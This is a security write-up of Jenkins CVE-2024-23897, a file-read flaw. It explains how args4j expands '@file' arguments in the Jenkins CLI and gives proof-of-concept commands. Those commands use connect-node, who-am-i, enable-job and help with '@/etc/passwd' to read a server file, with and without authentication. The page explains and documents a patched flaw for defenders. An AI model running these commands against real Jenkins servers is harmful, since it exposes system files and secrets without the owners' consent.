# Jenkins - CVE-2024-23897

## <mark style="color:red;">Data Leak Vulnerability</mark> (fixed in version 2.442, and LTS 2.426.3)

Using [Jenkins-CLI](https://www.jenkins.io/doc/book/managing/cli/) it's possible to leak data from the affected host.&#x20;

When invoking a CLI command with arguments, we have noticed that Jenkins uses [args4j’s](https://github.com/kohsuke/args4j) [parseArgument](https://github.com/jenkinsci/jenkins/blob/master/core/src/main/java/hudson/cli/CLICommand.java#L248), which [calls](https://github.com/kohsuke/args4j/blob/master/args4j/src/org/kohsuke/args4j/CmdLineParser.java#L479) [expandAtFiles](https://github.com/kohsuke/args4j/blob/master/args4j/src/org/kohsuke/args4j/CmdLineParser.java#L548):

```java
private String[] expandAtFiles(String args[]) throws CmdLineException {
    List<String> result = new ArrayList<String>();
    for (String arg : args) {
        if (arg.startsWith("@")) {
            File file = new File(arg.substring(1));
            if (!file.exists())
                throw new CmdLineException(this,Messages.NO_SUCH_FILE,file.getPath());
            try {
                result.addAll(readAllLines(file));
            } catch (IOException ex) {
                throw new CmdLineException(this, "Failed to parse "+file,ex);
            }
        } else {
            result.add(arg);
        }
    }
    return result.toArray(new String[result.size()]);
}
```

The function checks if the argument starts with the @ character, and if so, it reads the file in the path after the @ and expands a new argument for each line.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2F1osLJAYVrsp2AwwUh5bC%2FExpandAtFile_graph.webp?alt=media&#x26;token=c4e5adeb-8c11-4a9c-8f6f-310bc3ed8e88" alt=""><figcaption></figcaption></figure>

This means that if an attacker can control an argument, they can expand it to an arbitrary number of ones from an arbitrary file on the Jenkins instance.

***

### POC

Download the Jenkins CLI tool:

```bash
wget <https://xxx.yyy/jnlpJars/jenkins-cli.jar>
```

1. **Authenticated**, retrieve complete file:

```bash
$ java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins -auth abc:abc connect-node "@/etc/passwd"
```

2. **Unauthenticated** or missing Global/Read permissions, read ..

.. first line:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins who-am-i "@/etc/passwd"
```

.. second line:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins enable-job "@/etc/passwd"
```

.. third line:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins help "@/etc/passwd"
```

***

**Credits:** <https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/>